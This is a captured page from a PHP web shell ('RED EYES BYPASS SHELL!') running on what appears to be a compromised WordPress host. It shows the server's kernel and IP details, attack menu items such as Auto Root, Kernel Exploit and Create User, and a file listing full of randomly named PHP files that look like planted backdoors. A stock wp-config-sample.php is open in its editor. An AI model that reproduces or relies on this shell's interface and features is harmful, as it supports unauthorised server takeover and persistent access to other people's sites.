Linux webm003.cluster107.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.107.20.3 | : 216.73.216.205
Cant Read [ /etc/named.conf ]
hexamanupu
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
hexamanupu /
www /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.tmb136b63
[ DIR ]
dr--r--r--
0aebe
[ DIR ]
dr-xr-xr-x
boss2026yt
[ DIR ]
drwxr-xr-x
br2026yt
[ DIR ]
drwxr-xr-x
well-known64380a
[ DIR ]
drwxr-xr-x
wp-admina6fe9c
[ DIR ]
drwxr-xr-x
wp-contentd9f11e
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
wp-includes439bd5
[ DIR ]
drwxr-xr-x
.htaccess
1.13
KB
-r-xr-xr-x
1.txt90658f
6
B
-rw-r--r--
222.php148e7d
15.76
KB
-rw-r--r--
9a1c6959dd25dd44842341d12f8450f1123b96
52
B
-rw-r--r--
TSuUh.phpd6f0ac
1.29
KB
-rw-r--r--
adminner.php1a0298
67.86
KB
-rw-r--r--
buy.php
1.46
KB
-r--r--r--
click.php
2
KB
-r--r--r--
defaults.php
1.93
KB
-r--r--r--
detail.php6ef055
24.29
KB
-rw-r--r--
googlebb3efcc4a0a209ca.htmla91c0f
53
B
-rw-r--r--
googled3df579f0171ab33.html
53
B
-rw-r--r--
hyBQG.phpe01f9e
1.29
KB
-rw-r--r--
iNtsg68ea5e
0
B
-rw-r--r--
index.php
12.42
KB
-r-xr-xr-x
jDITV9a0428
0
B
-rw-r--r--
license.txt4e74c3
19.44
KB
-rw-r--r--
lowpr.php19a55f
1.02
KB
-rw-r--r--
o647ye.phpdf04ec
50.63
KB
-rw-r--r--
product.php
1.87
KB
-r--r--r--
products.php971220
24.27
KB
-rw-r--r--
readme.html6a3328
7.23
KB
-rw-r--r--
robots.txt
353
B
-r--r--r--
robots.txt20ee9a
253
B
-rw-r--r--
wp-activate.php98279c
7.2
KB
-rw-r--r--
wp-blog-header.php6c8f6c
351
B
-rw----r--
wp-comments-post.phpf14dc2
2.27
KB
-rw----r--
wp-config-sample.phpd4b29c
3.26
KB
-rw-r--r--
wp-config.php42c3c6
2.37
KB
-rw-------
wp-cron.php19ea39
5.49
KB
-rw-r--r--
wp-ea37bw5k.php577c7d
50.23
KB
-rw-r--r--
wp-links-opml.phpd96cfb
2.43
KB
-rw-r--r--
wp-load.php96508f
3.84
KB
-rw-r--r--
wp-mail.php16ec9d
8.52
KB
-rw-r--r--
wp-settings.php9dcb2a
31.88
KB
-rw-r--r--
wp-signup.phpf7d432
33.81
KB
-rw-r--r--
wp-stat.php100027
164.14
KB
-rw-r--r--
wp-trackback.phpe9792f
5.09
KB
-rw-r--r--
wp-ttcxamxv.phpdc52b7
50.63
KB
-rw-r--r--
wp-v3qnqww.php23f0a7
50.23
KB
-rw-r--r--
wp-wkajepch.php96032d
50.63
KB
-rw-r--r--
wrsou2x3.phpf6e7b4
50.23
KB
-rw-r--r--
xmlrpc.php005bca
3.13
KB
-rw-r--r--
xmlrpc_bkp.php705619
1.04
KB
-rw-r--r--
xxmlrpc.phpf91f16
1.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config-sample.phpd4b29c
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'database_name_here' ); /** Database username */ define( 'DB_USER', 'username_here' ); /** Database password */ define( 'DB_PASSWORD', 'password_here' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'put your unique phrase here' ); define( 'SECURE_AUTH_KEY', 'put your unique phrase here' ); define( 'LOGGED_IN_KEY', 'put your unique phrase here' ); define( 'NONCE_KEY', 'put your unique phrase here' ); define( 'AUTH_SALT', 'put your unique phrase here' ); define( 'SECURE_AUTH_SALT', 'put your unique phrase here' ); define( 'LOGGED_IN_SALT', 'put your unique phrase here' ); define( 'NONCE_SALT', 'put your unique phrase here' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close